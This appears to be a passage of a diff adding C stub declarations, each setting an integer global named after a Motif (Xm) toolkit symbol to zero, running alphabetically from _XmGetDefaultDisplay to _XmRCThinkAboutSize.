+int _XmGetDefaultDisplay = 0;
+int _XmGetDefaultFontList = 0;
+int _XmGetDefaultThresholdsForScreen = 0;
+int _XmGetDefaultTime = 0;
+int XmGetDestination = 0;
+int _XmGetDisplayObject = 0;
+int XmGetDragContext = 0;
+int _XmGetDragContextFromHandle = 0;
+int _XmGetDragCursorCachePtr = 0;
+int _XmGetDragProtocolStyle = 0;
+int _XmGetDragProxyWindow = 0;
+int _XmGetDragReceiverInfo = 0;
+int _XmGetDropSiteManagerObject = 0;
+int _XmGetEffectiveView = 0;
+int _XmGetEncodingRegistryTarget = 0;
+int _XmGetFirstFocus = 0;
+int _XmGetFirstFont = 0;
+int _XmGetFocus = 0;
+int _XmGetFocusData = 0;
+int _XmGetFocusFlag = 0;
+int _XmGetFocusPolicy = 0;
+int _XmGetFocusResetFlag = 0;
+int XmGetFocusWidget = 0;
+int _XmGetFontUnit = 0;
+int _XmGetHashEntryIterate = 0;
+int _XmGetHighlightColor = 0;
+int _XmGetIconControlInfo = 0;
+int XmGetIconFileName = 0;
+int _XmGetIconPixmapName = 0;
+int _XmGetImage = 0;
+int _XmGetImageAndHotSpotFromFile = 0;
+int _XmGetImageFromFile = 0;
+int _XmGetInDragMode = 0;
+int _XmGetInsensitiveStippleBitmap = 0;
+int _XmGetKidGeo = 0;
+int _XmGetLayoutDirection = 0;
+int _XmGetManagedInfo = 0;
+int _XmGetMaxCursorSize = 0;
+int _XmGetMBStringFromXmString = 0;
+int XmGetMenuCursor = 0;
+int _XmGetMenuCursorByScreen = 0;
+int _XmGetMenuProcContext = 0;
+int _XmGetMenuState = 0;
+int _XmGetMotifAtom = 0;
+int _XmGetMoveOpaqueByScreen = 0;
+int _XmGetNavigability = 0;
+int _XmGetNavigationType = 0;
+int _Xm_GetNewElement = 0;
+int XmGetNewPictureState = 0;
+int _XmGetNullCursor = 0;
+int _XmGetPixelData = 0;
+int _XmGetPixmap = 0;
+int XmGetPixmap = 0;
+int _XmGetPixmapBasedGC = 0;
+int XmGetPixmapByDepth = 0;
+int _XmGetPixmapData = 0;
+int _XmGetPointVisibility = 0;
+int _XmGetPopupMenuClick = 0;
+int XmGetPostedFromWidget = 0;
+int _XmGetRC_PopupPosted = 0;
+int _XmGetRealXlations = 0;
+int _XmGetScaledPixmap = 0;
+int XmGetScaledPixmap = 0;
+int _XmGetScreenObject = 0;
+int XmGetSecondaryResourceData = 0;
+int _XmGetTabGroup = 0;
+int XmGetTabGroup = 0;
+int XmGetTearOffControl = 0;
+int _XmGetTextualDragIcon = 0;
+int XmGetToolTipString = 0;
+int _XmGetTopShadowColor = 0;
+int _XmGetTransientFlag = 0;
+int _XmGetUnitType = 0;
+int _XmGetUnpostBehavior = 0;
+int XmGetVisibility = 0;
+int _XmGetWidgetExtData = 0;
+int _XmGetWidgetNavigPtrs = 0;
+int _XmGetWorldObject = 0;
+int _XmGetWrapperData = 0;
+int XmGetXmDisplay = 0;
+int _XmGetXmDisplayClass = 0;
+int XmGetXmScreen = 0;
+int _XmGMCalcSize = 0;
+int _XmGMDoLayout = 0;
+int _XmGMEnforceMargin = 0;
+int _XmGMHandleGeometryManager = 0;
+int _XmGMHandleQueryGeometry = 0;
+int _XmGMOverlap = 0;
+int _XmGMReplyToQueryGeometry = 0;
+int _XmGrabKeyboard = 0;
+int _XmGrabPointer = 0;
+int xmGrabShellClassRec = 0;
+int _XmGrabShell_translations = 0;
+int xmGrabShellWidgetClass = 0;
+int _XmGrabTheFocus = 0;
+int _XmHandleGeometryManager = 0;
+int _XmHandleMenuButtonPress = 0;
+int _XmHandleQueryGeometry = 0;
+int _XmHandleSizeUpdate = 0;
+int _XmHashTableCount = 0;
+int _XmHashTableSize = 0;
+int _XmHeapAlloc = 0;
+int _XmHeapCreate = 0;
+int _XmHeapFree = 0;
+int xmHierarchyClassRec = 0;
+int XmHierarchyGetChildNodes = 0;
+int XmHierarchyOpenAllAncestors = 0;
+int xmHierarchyWidgetClass = 0;
+int _XmHighlightBorder = 0;
+int _XmHighlightColorDefault = 0;
+int _XmHighlightPixmapDefault = 0;
+int _XmHWQuery = 0;
+int xmI18ListClassRec = 0;
+int XmI18ListDeselectItems = 0;
+int XmI18ListDeselectRow = 0;
+int XmI18ListDoSearch = 0;
+int XmI18ListFindRow = 0;
+int XmI18ListGetSelectedRowArray = 0;
+int XmI18ListGetSelectedRows = 0;
+int XmI18ListMakeRowVisible = 0;
+int XmI18ListSelectAllItems = 0;
+int XmI18ListSelectItems = 0;
+int XmI18ListSelectRow = 0;
+int XmI18ListToggleRow = 0;
+int xmI18ListWidgetClass = 0;
+int _XmICCCallbackToICCEvent = 0;
+int _XmICCEventToICCCallback = 0;
+int xmIconBoxClassRec = 0;
+int XmIconBoxIsCellEmpty = 0;
+int xmIconBoxWidgetClass = 0;
+int xmIconButtonClassRec = 0;
+int xmIconButtonWidgetClass = 0;
+int xmIconGadgetClass = 0;
+int xmIconGadgetClassRec = 0;
+int _XmIconGadgetIconPos = 0;
+int xmIconGCacheObjClassRec = 0;
+int xmIconHeaderClass = 0;
+int xmIconHeaderClassRec = 0;
+int _XmIEndUpdate = 0;
+int _XmImChangeManaged = 0;
+int XmImCloseXIM = 0;
+int _XmImFreeShellData = 0;
+int XmImFreeXIC = 0;
+int XmImGetXIC = 0;
+int XmImGetXICResetState = 0;
+int XmImGetXIM = 0;
+int XmImMbLookupString = 0;
+int XmImMbResetIC = 0;
+int _XmImRealize = 0;
+int _XmImRedisplay = 0;
+int XmImRegister = 0;
+int _XmImResize = 0;
+int XmImSetFocusValues = 0;
+int XmImSetValues = 0;
+int XmImSetXIC = 0;
+int XmImUnregister = 0;
+int XmImUnsetFocus = 0;
+int XmImVaSetFocusValues = 0;
+int XmImVaSetValues = 0;
+int _XmIndexToTargets = 0;
+int _XmInheritClass = 0;
+int _XmInImageCache = 0;
+int _XmInitByteOrderChar = 0;
+int _XmInitializeExtensions = 0;
+int _XmInitializeMenuCursor = 0;
+int _XmInitializeScrollBars = 0;
+int _XmInitializeSyntheticResources = 0;
+int _XmInitializeTraits = 0;
+int _XmInitModifiers = 0;
+int _XmInitTargetsTable = 0;
+int _XmInputForGadget = 0;
+int _XmInputInGadget = 0;
+int _XmInstallImage = 0;
+int XmInstallImage = 0;
+int _XmInstallPixmap = 0;
+int _XmInstallProtocols = 0;
+int XmInternAtom = 0;
+int _XmIntersectionOf = 0;
+int _XmIntersectRect = 0;
+int _XmInvalidCursorIconQuark = 0;
+int _XmIsActiveTearOff = 0;
+int _XmIsEventUnique = 0;
+int _XmIsFastSubclass = 0;
+int _XmIsISO10646 = 0;
+int XmIsMotifWMRunning = 0;
+int _XmIsNavigable = 0;
+int _XmIsScrollableClipWidget = 0;
+int _XmIsSlowSubclass = 0;
+int _XmIsStandardMotifWidgetClass = 0;
+int _XmIsSubclassOf = 0;
+int _XmIsTearOffShellDescendant = 0;
+int XmIsTraversable = 0;
+int _XmIsViewable = 0;
+int _XmJpegErrorExit = 0;
+int _XmJpegGetImage = 0;
+int _XmLabel_AccessTextualRecord = 0;
+int _XmLabelCacheCompare = 0;
+int _XmLabelCalcTextRect = 0;
+int xmLabelClassRec = 0;
+int _XmLabelCloneMenuSavvy = 0;
+int _XmLabelConvert = 0;
+int _XmLabel_defaultTranslations = 0;
+int _XmLabelGadClassExtRec = 0;
+int xmLabelGadgetClass = 0;
+int xmLabelGadgetClassRec = 0;
+int xmLabelGCacheObjClassRec = 0;
+int _XmLabelGCalcTextRect = 0;
+int _XmLabelGCloneMenuSavvy = 0;
+int _XmLabelGCVTRedraw = 0;
+int _XmLabel_menuTranslations = 0;
+int _XmLabel_menu_traversal_events = 0;
+int _XmLabelPrimClassExtRec = 0;
+int _XmLabelSetBackgroundGC = 0;
+int xmLabelWidgetClass = 0;
+int _XmLeafPaneFocusOut = 0;
+int _XmLeaveGadget = 0;
+int _XmLinkCursorIconQuark = 0;
+int _XmListAddAfter = 0;
+int _XmListAddBefore = 0;
+int XmListAddItem = 0;
+int XmListAddItems = 0;
+int XmListAddItemsUnselected = 0;
+int XmListAddItemUnselected = 0;
+int xmListClassRec = 0;
+int _XmListCount = 0;
+int XmListDeleteAllItems = 0;
+int XmListDeleteItem = 0;
+int XmListDeleteItems = 0;
+int XmListDeleteItemsPos = 0;
+int XmListDeletePos = 0;
+int XmListDeletePositions = 0;
+int XmListDeselectAllItems = 0;
+int XmListDeselectItem = 0;
+int XmListDeselectPos = 0;
+int _XmListExec = 0;
+int _XmListFree = 0;
+int XmListGetKbdItemPos = 0;
+int XmListGetMatchPos = 0;
+int XmListGetSelectedPos = 0;
+int _XmListInit = 0;
+int XmListItemExists = 0;
+int XmListItemPos = 0;
+int _XmList_ListXlations1 = 0;
+int _XmList_ListXlations2 = 0;
+int XmListPosSelected = 0;
+int XmListPosToBounds = 0;
+int _XmListRemove = 0;
+int XmListReplaceItems = 0;
+int XmListReplaceItemsPos = 0;
+int XmListReplaceItemsPosUnselected = 0;
+int XmListReplaceItemsUnselected = 0;
+int XmListReplacePositions = 0;
+int XmListSelectItem = 0;
+int XmListSelectPos = 0;
+int XmListSetAddMode = 0;
+int XmListSetBottomItem = 0;
+int XmListSetBottomPos = 0;
+int XmListSetHorizPos = 0;
+int XmListSetItem = 0;
+int XmListSetKbdItemPos = 0;
+int XmListSetPos = 0;
+int XmListUpdateSelectedList = 0;
+int xmListWidgetClass = 0;
+int XmListYToPos = 0;
+int _XmLowerCase = 0;
+int _XmLowerTearOffObscuringPoppingDownPanes = 0;
+int xmMainWindowClassRec = 0;
+int XmMainWindowSep1 = 0;
+int XmMainWindowSep2 = 0;
+int XmMainWindowSep3 = 0;
+int XmMainWindowSetAreas = 0;
+int xmMainWindowWidgetClass = 0;
+int _XmMakeGeometryRequest = 0;
+int xmManagerClassRec = 0;
+int _XmManager_defaultTranslations = 0;
+int _XmManagerEnter = 0;
+int _XmManagerFocusIn = 0;
+int _XmManagerFocusInInternal = 0;
+int _XmManagerFocusOut = 0;
+int _XmManagerGetValuesHook = 0;
+int _XmManagerHelp = 0;
+int _XmManagerHighlightPixmapDefault = 0;
+int _XmManagerImportArgs = 0;
+int _XmManagerLeave = 0;
+int _XmManager_managerTraversalTranslations = 0;
+int _XmManagerParentActivate = 0;
+int _XmManagerParentCancel = 0;
+int _XmManagerTopShadowPixmapDefault = 0;
+int _XmManagerUnmap = 0;
+int xmManagerWidgetClass = 0;
+int _XmMapBtnEvent = 0;
+int _XmMapHashTable = 0;
+int _XmMapKeyEvent = 0;
+int _XmMapKeyEvents = 0;
+int XmMapSegmentEncoding = 0;
+int _XmMatchBDragEvent = 0;
+int _XmMatchBSelectEvent = 0;
+int _XmMatchBtnEvent = 0;
+int _XmMatchKeyEvent = 0;
+int _XmMenuBarFix = 0;
+int _XmMenuBarGadgetSelect = 0;
+int _XmMenuBtnDown = 0;
+int _XmMenuBtnUp = 0;
+int _XmMenuButtonTakeFocus = 0;
+int _XmMenuButtonTakeFocusUp = 0;
+int _XmMenuCursorContext = 0;
+int _XmMenuEscape = 0;
+int _XmMenuFocus = 0;
+int _XmMenuFocusIn = 0;
+int _XmMenuFocusOut = 0;
+int _XmMenuGadgetDrag = 0;
+int _XmMenuGadgetTraverseCurrent = 0;
+int _XmMenuGadgetTraverseCurrentUp = 0;
+int _XmMenuGrabKeyboardAndPointer = 0;
+int _XmMenuHelp = 0;
+int _XmMenuPopDown = 0;
+int XmMenuPosition = 0;
+int _XmMenuSetInPMMode = 0;
+int xmMenuShellClassRec = 0;
+int _XmMenuShell_translations = 0;
+int xmMenuShellWidgetClass = 0;
+int _XmMenuTraversalHandler = 0;
+int _XmMenuTraverseDown = 0;
+int _XmMenuTraverseLeft = 0;
+int _XmMenuTraverseRight = 0;
+int _XmMenuTraverseUp = 0;
+int _XmMenuUnmap = 0;
+int xmMessageBoxClassRec = 0;
+int _XmMessageBoxGeoMatrixCreate = 0;
+int XmMessageBoxGetChild = 0;
+int _XmMessageBoxNoGeoRequest = 0;
+int xmMessageBoxWidgetClass = 0;
+int _XmMessageTypeToReason = 0;
+int _XmMgrTraversal = 0;
+int _XmMicroSleep = 0;
+int _Xm_MOTIF_DRAG_AND_DROP_MESSAGE = 0;
+int _XmMoveCursorIconQuark = 0;
+int _XmMoveObject = 0;
+int _XmMoveWidget = 0;
+int _XmMsgBaseClass_0000 = 0;
+int _XmMsgBaseClass_0001 = 0;
+int _XmMsgBulletinB_0001 = 0;
+int _XmMsgCascadeB_0000 = 0;
+int _XmMsgCascadeB_0001 = 0;
+int _XmMsgCascadeB_0002 = 0;
+int _XmMsgCascadeB_0003 = 0;
+int _XmMsgColObj_0001 = 0;
+int _XmMsgColObj_0002 = 0;
+int _XmMsgComboBox_0000 = 0;
+int _XmMsgComboBox_0001 = 0;
+int _XmMsgComboBox_0004 = 0;
+int _XmMsgComboBox_0005 = 0;
+int _XmMsgComboBox_0006 = 0;
+int _XmMsgComboBox_0007 = 0;
+int _XmMsgComboBox_0008 = 0;
+int _XmMsgComboBox_0009 = 0;
+int _XmMsgComboBox_0010 = 0;
+int _XmMsgComboBox_0011 = 0;
+int _XmMsgComboBox_0012 = 0;
+int _XmMsgComboBox_0013 = 0;
+int _XmMsgComboBox_0014 = 0;
+int _XmMsgCommand_0000 = 0;
+int _XmMsgCommand_0001 = 0;
+int _XmMsgCommand_0002 = 0;
+int _XmMsgCommand_0003 = 0;
+int _XmMsgCommand_0004 = 0;
+int _XmMsgCommand_0005 = 0;
+int _XmMsgContainer_0000 = 0;
+int _XmMsgContainer_0001 = 0;
+int _XmMsgCutPaste_0000 = 0;
+int _XmMsgCutPaste_0001 = 0;
+int _XmMsgCutPaste_0002 = 0;
+int _XmMsgCutPaste_0003 = 0;
+int _XmMsgCutPaste_0004 = 0;
+int _XmMsgCutPaste_0005 = 0;
+int _XmMsgCutPaste_0006 = 0;
+int _XmMsgCutPaste_0007 = 0;
+int _XmMsgCutPaste_0008 = 0;
+int _XmMsgCutPaste_0009 = 0;
+int _XmMsgDataF_0000 = 0;
+int _XmMsgDataF_0001 = 0;
+int _XmMsgDataF_0002 = 0;
+int _XmMsgDataF_0003 = 0;
+int _XmMsgDataF_0004 = 0;
+int _XmMsgDataF_0005 = 0;
+int _XmMsgDataF_0006 = 0;
+int _XmMsgDataFWcs_0000 = 0;
+int _XmMsgDataFWcs_0001 = 0;
+int _XmMsgDialogS_0000 = 0;
+int _XmMsgDisplay_0001 = 0;
+int _XmMsgDisplay_0002 = 0;
+int _XmMsgDisplay_0003 = 0;
+int _XmMsgDragBS_0000 = 0;
+int _XmMsgDragBS_0001 = 0;
+int _XmMsgDragBS_0002 = 0;
+int _XmMsgDragBS_0003 = 0;
+int _XmMsgDragBS_0004 = 0;
+int _XmMsgDragBS_0005 = 0;
+int _XmMsgDragBS_0006 = 0;
+int _XmMsgDragC_0001 = 0;
+int _XmMsgDragC_0002 = 0;
+int _XmMsgDragC_0003 = 0;
+int _XmMsgDragC_0004 = 0;
+int _XmMsgDragC_0005 = 0;
+int _XmMsgDragC_0006 = 0;
+int _XmMsgDragICC_0000 = 0;
+int _XmMsgDragICC_0001 = 0;
+int _XmMsgDragIcon_0000 = 0;
+int _XmMsgDragIcon_0001 = 0;
+int _XmMsgDragOverS_0000 = 0;
+int _XmMsgDragOverS_0001 = 0;
+int _XmMsgDragOverS_0002 = 0;
+int _XmMsgDragOverS_0003 = 0;
+int _XmMsgDragUnder_0000 = 0;
+int _XmMsgDragUnder_0001 = 0;
+int _XmMsgDropSMgr_0001 = 0;
+int _XmMsgDropSMgr_0002 = 0;
+int _XmMsgDropSMgr_0003 = 0;
+int _XmMsgDropSMgr_0004 = 0;
+int _XmMsgDropSMgr_0005 = 0;
+int _XmMsgDropSMgr_0006 = 0;
+int _XmMsgDropSMgr_0007 = 0;
+int _XmMsgDropSMgr_0008 = 0;
+int _XmMsgDropSMgr_0009 = 0;
+int _XmMsgDropSMgr_0010 = 0;
+int _XmMsgDropSMgrI_0001 = 0;
+int _XmMsgDropSMgrI_0002 = 0;
+int _XmMsgDropSMgrI_0003 = 0;
+int _XmMsgForm_0000 = 0;
+int _XmMsgForm_0002 = 0;
+int _XmMsgForm_0003 = 0;
+int _XmMsgGadget_0000 = 0;
+int _XmMsgLabel_0003 = 0;
+int _XmMsgLabel_0004 = 0;
+int _XmMsgList_0000 = 0;
+int _XmMsgList_0005 = 0;
+int _XmMsgList_0006 = 0;
+int _XmMsgList_0007 = 0;
+int _XmMsgList_0008 = 0;
+int _XmMsgList_0009 = 0;
+int _XmMsgList_0010 = 0;
+int _XmMsgList_0011 = 0;
+int _XmMsgList_0012 = 0;
+int _XmMsgList_0013 = 0;
+int _XmMsgList_0014 = 0;
+int _XmMsgList_0015 = 0;
+int _XmMsgMainW_0000 = 0;
+int _XmMsgMainW_0001 = 0;
+int _XmMsgManager_0000 = 0;
+int _XmMsgManager_0001 = 0;
+int _XmMsgMenuShell_0000 = 0;
+int _XmMsgMenuShell_0001 = 0;
+int _XmMsgMenuShell_0002 = 0;
+int _XmMsgMenuShell_0003 = 0;
+int _XmMsgMenuShell_0004 = 0;
+int _XmMsgMenuShell_0005 = 0;
+int _XmMsgMenuShell_0006 = 0;
+int _XmMsgMenuShell_0007 = 0;
+int _XmMsgMenuShell_0008 = 0;
+int _XmMsgMenuShell_0009 = 0;
+int _XmMsgMessageB_0003 = 0;
+int _XmMsgMessageB_0004 = 0;
+int _XmMsgMotif_0000 = 0;
+int _XmMsgMotif_0001 = 0;
+int _XmMsgNotebook_0000 = 0;
+int _XmMsgPanedW_0000 = 0;
+int _XmMsgPanedW_0001 = 0;
+int _XmMsgPanedW_0002 = 0;
+int _XmMsgPanedW_0004 = 0;
+int _XmMsgPanedW_0005 = 0;
+int _XmMsgPixConv_0000 = 0;
+int _XmMsgPrimitive_0000 = 0;
+int _XmMsgProtocols_0000 = 0;
+int _XmMsgProtocols_0001 = 0;
+int _XmMsgProtocols_0002 = 0;
+int _XmMsgRegion_0000 = 0;
+int _XmMsgRepType_0000 = 0;
+int _XmMsgRepType_0001 = 0;
+int _XmMsgRepType_0002 = 0;
+int _XmMsgResConvert_0001 = 0;
+int _XmMsgResConvert_0002 = 0;
+int _XmMsgResConvert_0003 = 0;
+int _XmMsgResConvert_0005 = 0;
+int _XmMsgResConvert_0006 = 0;
+int _XmMsgResConvert_0007 = 0;
+int _XmMsgResConvert_0008 = 0;
+int _XmMsgResConvert_0009 = 0;
+int _XmMsgResConvert_0010 = 0;
+int _XmMsgResConvert_0011 = 0;
+int _XmMsgResConvert_0012 = 0;
+int _XmMsgResConvert_0013 = 0;
+int _XmMsgResource_0001 = 0;
+int _XmMsgResource_0002 = 0;
+int _XmMsgResource_0003 = 0;
+int _XmMsgResource_0004 = 0;
+int _XmMsgResource_0005 = 0;
+int _XmMsgResource_0006 = 0;
+int _XmMsgResource_0007 = 0;
+int _XmMsgResource_0008 = 0;
+int _XmMsgResource_0009 = 0;
+int _XmMsgResource_0010 = 0;
+int _XmMsgResource_0011 = 0;
+int _XmMsgResource_0012 = 0;
+int _XmMsgResource_0013 = 0;
+int _XmMsgRowColText_0024 = 0;
+int _XmMsgRowColumn_0000 = 0;
+int _XmMsgRowColumn_0001 = 0;
+int _XmMsgRowColumn_0002 = 0;
+int _XmMsgRowColumn_0003 = 0;
+int _XmMsgRowColumn_0004 = 0;
+int _XmMsgRowColumn_0005 = 0;
+int _XmMsgRowColumn_0007 = 0;
+int _XmMsgRowColumn_0008 = 0;
+int _XmMsgRowColumn_0015 = 0;
+int _XmMsgRowColumn_0016 = 0;
+int _XmMsgRowColumn_0017 = 0;
+int _XmMsgRowColumn_0018 = 0;
+int _XmMsgRowColumn_0019 = 0;
+int _XmMsgRowColumn_0020 = 0;
+int _XmMsgRowColumn_0022 = 0;
+int _XmMsgRowColumn_0023 = 0;
+int _XmMsgRowColumn_0025 = 0;
+int _XmMsgRowColumn_0026 = 0;
+int _XmMsgRowColumn_0027 = 0;
+int _XmMsgScale_0000 = 0;
+int _XmMsgScale_0001 = 0;
+int _XmMsgScale_0002 = 0;
+int _XmMsgScale_0006 = 0;
+int _XmMsgScale_0007 = 0;
+int _XmMsgScale_0008 = 0;
+int _XmMsgScale_0009 = 0;
+int _XmMsgScaleScrBar_0004 = 0;
+int _XmMsgScreen_0000 = 0;
+int _XmMsgScreen_0001 = 0;
+int _XmMsgScrollBar_0000 = 0;
+int _XmMsgScrollBar_0001 = 0;
+int _XmMsgScrollBar_0002 = 0;
+int _XmMsgScrollBar_0003 = 0;
+int _XmMsgScrollBar_0004 = 0;
+int _XmMsgScrollBar_0005 = 0;
+int _XmMsgScrollBar_0006 = 0;
+int _XmMsgScrollBar_0007 = 0;
+int _XmMsgScrollBar_0008 = 0;
+int _XmMsgScrolledW_0004 = 0;
+int _XmMsgScrolledW_0005 = 0;
+int _XmMsgScrolledW_0006 = 0;
+int _XmMsgScrolledW_0007 = 0;
+int _XmMsgScrolledW_0008 = 0;
+int _XmMsgScrolledW_0009 = 0;
+int _XmMsgScrollFrameT_0000 = 0;
+int _XmMsgScrollFrameT_0001 = 0;
+int _XmMsgScrollVis_0000 = 0;
+int _XmMsgSelectioB_0001 = 0;
+int _XmMsgSelectioB_0002 = 0;
+int _XmMsgSpinB_0003 = 0;
+int _XmMsgSpinB_0004 = 0;
+int _XmMsgSpinB_0005 = 0;
+int _XmMsgSpinB_0006 = 0;
+int _XmMsgSpinB_0007 = 0;
+int _XmMsgSpinB_0008 = 0;
+int _XmMsgSSpinB_0001 = 0;
+int _XmMsgSSpinB_0002 = 0;
+int _XmMsgSSpinB_0003 = 0;
+int _XmMsgText_0000 = 0;
+int _XmMsgTextF_0000 = 0;
+int _XmMsgTextF_0001 = 0;
+int _XmMsgTextF_0002 = 0;
+int _XmMsgTextF_0003 = 0;
+int _XmMsgTextF_0004 = 0;
+int _XmMsgTextF_0006 = 0;
+int _XmMsgTextFWcs_0000 = 0;
+int _XmMsgTextIn_0000 = 0;
+int _XmMsgTextOut_0000 = 0;
+int _XmMsgTransfer_0000 = 0;
+int _XmMsgTransfer_0002 = 0;
+int _XmMsgTransfer_0003 = 0;
+int _XmMsgTransfer_0004 = 0;
+int _XmMsgTransfer_0005 = 0;
+int _XmMsgTransfer_0006 = 0;
+int _XmMsgTransfer_0007 = 0;
+int _XmMsgVaSimple_0000 = 0;
+int _XmMsgVaSimple_0001 = 0;
+int _XmMsgVaSimple_0002 = 0;
+int _XmMsgVendor_0000 = 0;
+int _XmMsgVendor_0001 = 0;
+int _XmMsgVendor_0002 = 0;
+int _XmMsgVendor_0003 = 0;
+int _XmMsgVisual_0000 = 0;
+int _XmMsgVisual_0001 = 0;
+int _XmMsgVisual_0002 = 0;
+int _XmMsgXmIm_0000 = 0;
+int _XmMsgXmRenderT_0000 = 0;
+int _XmMsgXmRenderT_0001 = 0;
+int _XmMsgXmRenderT_0002 = 0;
+int _XmMsgXmRenderT_0003 = 0;
+int _XmMsgXmRenderT_0004 = 0;
+int _XmMsgXmRenderT_0005 = 0;
+int _XmMsgXmString_0000 = 0;
+int _XmMsgXmTabList_0000 = 0;
+int xmMultiListClassRec = 0;
+int XmMultiListDeselectItems = 0;
+int XmMultiListDeselectRow = 0;
+int XmMultiListGetSelectedRowArray = 0;
+int XmMultiListGetSelectedRows = 0;
+int XmMultiListMakeRowVisible = 0;
+int XmMultiListSelectAllItems = 0;
+int XmMultiListSelectItems = 0;
+int XmMultiListSelectRow = 0;
+int XmMultiListToggleRow = 0;
+int XmMultiListUnselectAllItems = 0;
+int XmMultiListUnselectItem = 0;
+int xmMultiListWidgetClass = 0;
+int _XmNavigate = 0;
+int _XmNavigChangeManaged = 0;
+int _XmNavigDestroy = 0;
+int _XmNavigInitialize = 0;
+int _XmNavigResize = 0;
+int _XmNavigSetValues = 0;
+int _XmNewTravGraph = 0;
+int _XmNoneCursorIconQuark = 0;
+int xmNotebookClassRec = 0;
+int XmNotebookGetPageInfo = 0;
+int _XmNotebook_manager_translations = 0;
+int _XmNotebook_TabAccelerators = 0;
+int xmNotebookWidgetClass = 0;
+int _XmNotifyChildrenVisual = 0;
+int _XmNumDSResources = 0;
+int XmObjectAtPoint = 0;
+int _XmOffsetArrow = 0;
+int XmOptionButtonGadget = 0;
+int XmOptionLabelGadget = 0;
+int _XmOSAbsolutePathName = 0;
+int _XmOSBuildFileList = 0;
+int _XmOSBuildFileName = 0;
+int _XmOSFileCompare = 0;
+int _XmOSFindPathParts = 0;
+int _XmOSFindPatternPart = 0;
+int _XmOSGenerateMaskName = 0;
+int _XmOSGetCharDirection = 0;
+int _XmOSGetDirEntries = 0;
+int _XmOSGetHomeDirName = 0;
+int _XmOSGetInitialCharsDirection = 0;
+int _XmOSGetLocalizedString = 0;
+int XmOSGetMethod = 0;
+int _XmOSInitPath = 0;
+int _XmOSKeySymToCharacter = 0;
+int _XmOSPutenv = 0;
+int _XmOSQualifyFileSpec = 0;
+int xmOutlineClassRec = 0;
+int xmOutlineWidgetClass = 0;
+int XMoveResizeWindow = 0;
+int XMoveWindow = 0;
+int xmPanedClassRec = 0;
+int XmPanedGetPanes = 0;
+int xmPanedWidgetClass = 0;
+int xmPanedWindowClassRec = 0;
+int xmPanedWindowWidgetClass = 0;
+int _XmParentProcess = 0;
+int XmParseMappingCreate = 0;
+int XmParseMappingFree = 0;
+int XmParseMappingGetValues = 0;
+int XmParseMappingSetValues = 0;
+int XmParsePicture = 0;
+int XmParseTableFree = 0;
+int _XmPathIsTraversable = 0;
+int XmPictureDelete = 0;
+int XmPictureDeleteState = 0;
+int XmPictureDoAutoFill = 0;
+int XmPictureGetCurrentString = 0;
+int XmPictureProcessCharacter = 0;
+int _XmPngGetImage = 0;
+int _XmPopdown = 0;
+int _XmPopup = 0;
+int _XmPopupSpringLoaded = 0;
+int _XmPopWidgetExtData = 0;
+int _XmPostPopupMenu = 0;
+int _XmPrimbaseClassExtRec = 0;
+int _XmPrimClassExtRec = 0;
+int xmPrimitiveClassRec = 0;
+int _XmPrimitive_defaultTranslations = 0;
+int _XmPrimitiveEnter = 0;
+int _XmPrimitiveFocusIn = 0;
+int _XmPrimitiveFocusInInternal = 0;
+int _XmPrimitiveFocusOut = 0;
+int _XmPrimitiveGetValuesHook = 0;
+int _XmPrimitiveHelp = 0;
+int _XmPrimitiveHighlightPixmapDefault = 0;
+int _XmPrimitiveImportArgs = 0;
+int _XmPrimitiveLeave = 0;
+int _XmPrimitiveParentActivate = 0;
+int _XmPrimitiveParentCancel = 0;
+int _XmPrimitiveTopShadowPixmapDefault = 0;
+int _XmPrimitiveUnmap = 0;
+int xmPrimitiveWidgetClass = 0;
+int _XmProcessDrag = 0;
+int _XmProcessTraversal = 0;
+int XmProcessTraversal = 0;
+int xmProtocolClassRec = 0;
+int xmProtocolObjectClass = 0;
+int _XmPushB_defaultTranslations = 0;
+int _XmPushBGadClassExtRec = 0;
+int _XmPushB_menuTranslations = 0;
+int _XmPushBPrimClassExtRec = 0;
+int xmPushButtonClassRec = 0;
+int xmPushButtonGadgetClass = 0;
+int xmPushButtonGadgetClassRec = 0;
+int xmPushButtonGCacheObjClassRec = 0;
+int xmPushButtonWidgetClass = 0;
+int _XmPushWidgetExtData = 0;
+int _XmPutScaledImage = 0;
+int XmQmotif = 0;
+int XmQTaccessColors = 0;
+int XmQTaccessTextual = 0;
+int XmQTactivatable = 0;
+int XmQTcareParentVisual = 0;
+int _XmQTclipWindow = 0;
+int XmQTcontainer = 0;
+int XmQTcontainerItem = 0;
+int XmQTdialogShellSavvy = 0;
+int XmQTjoinSide = 0;
+int XmQTmenuSavvy = 0;
+int XmQTmenuSystem = 0;
+int XmQTmotifTrait = 0;
+int XmQTnavigator = 0;
+int XmQTpointIn = 0;
+int XmQTscrollFrame = 0;
+int XmQTspecifyLayoutDirection = 0;
+int XmQTspecifyRenderTable = 0;
+int XmQTspecifyUnhighlight = 0;
+int XmQTspecifyUnitType = 0;
+int XmQTtakesDefault = 0;
+int XmQTtoolTip = 0;
+int XmQTtoolTipConfig = 0;
+int XmQTtransfer = 0;
+int XmQTtraversalControl = 0;
+int _XmQualifyLabelLocalCache = 0;
+int _XmQueryPixmapCache = 0;
+int _XmQueueCount = 0;
+int _XmQueueFree = 0;
+int _XmQueueInit = 0;
+int _XmQueuePop = 0;
+int _XmRCAdaptToSize = 0;
+int _XmRC_AddPopupEventHandlers = 0;
+int _XmRC_AddToPostFromList = 0;
+int _XmRCArmAndActivate = 0;
+int _XmRC_CheckAndSetOptionCascade = 0;
+int _XmRCColorHook = 0;
+int _XmRCDoMarginAdjustment = 0;
+int _XmRC_DoProcessMenuTree = 0;
+int _XmRC_GadgetTraverseDown = 0;
+int _XmRC_GadgetTraverseLeft = 0;
+int _XmRC_GadgetTraverseRight = 0;
+int _XmRC_GadgetTraverseUp = 0;
+int _XmRCGetKidGeo = 0;
+int _XmRC_GetLabelString = 0;
+int _XmRC_GetMenuAccelerator = 0;
+int _XmRC_GetMnemonicCharSet = 0;
+int _XmRCGetTopManager = 0;
+int _XmRC_KeyboardInputHandler = 0;
+int _XmRCMenuProcedureEntry = 0;
+int _XmRC_menuSystemRecord = 0;
+int _XmRC_PostTimeOut = 0;
+int _XmRCPreferredSize = 0;
+int _XmRC_ProcessSingleWidget = 0;
+int _XmRC_RemoveFromPostFromList = 0;
+int _XmRC_RemoveFromPostFromListOnDestroyCB = 0;
+int _XmRC_RemoveHandlersFromPostFromWidget = 0;
+int _XmRC_RemovePopupEventHandlers = 0;
+int _XmRCSetKidGeo = 0;
+int _XmRC_SetMenuHistory = 0;
+int _XmRC_SetOptionMenuHistory = 0;
+int _XmRC_SetOrGetTextMargins = 0;
+int _XmRCThinkAboutSize = 0;
